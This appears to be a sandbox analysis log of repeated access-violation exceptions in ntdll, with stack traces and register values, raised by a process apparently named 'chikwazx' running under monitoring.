__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7769ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7769af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632992 registers.edi: 1633080 registers.eax: 23117 registers.ebp: 1633052 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633116 registers.edi: 1633212 registers.eax: 23117 registers.ebp: 1633176 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003414528	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7768199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7768193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633008 registers.edi: 1633096 registers.eax: 23117 registers.ebp: 1633068 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7769af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632860 registers.edi: 1632956 registers.eax: 23117 registers.ebp: 1632920 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003311104	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7769ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7769af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632992 registers.edi: 1633080 registers.eax: 23117 registers.ebp: 1633052 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633116 registers.edi: 1633212 registers.eax: 23117 registers.ebp: 1633176 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003414528	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7768199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7768193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633008 registers.edi: 1633096 registers.eax: 23117 registers.ebp: 1633068 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7769af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632860 registers.edi: 1632956 registers.eax: 23117 registers.ebp: 1632920 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003311104	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7769ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7769af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632992 registers.edi: 1633080 registers.eax: 23117 registers.ebp: 1633052 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633116 registers.edi: 1633212 registers.eax: 23117 registers.ebp: 1633176 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003414528	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7768199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7768193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633008 registers.edi: 1633096 registers.eax: 23117 registers.ebp: 1633068 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7769af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632860 registers.edi: 1632956 registers.eax: 23117 registers.ebp: 1632920 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003311104	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7769ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7769af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632992 registers.edi: 1633080 registers.eax: 23117 registers.ebp: 1633052 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633116 registers.edi: 1633212 registers.eax: 23117 registers.ebp: 1633176 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003414528	1
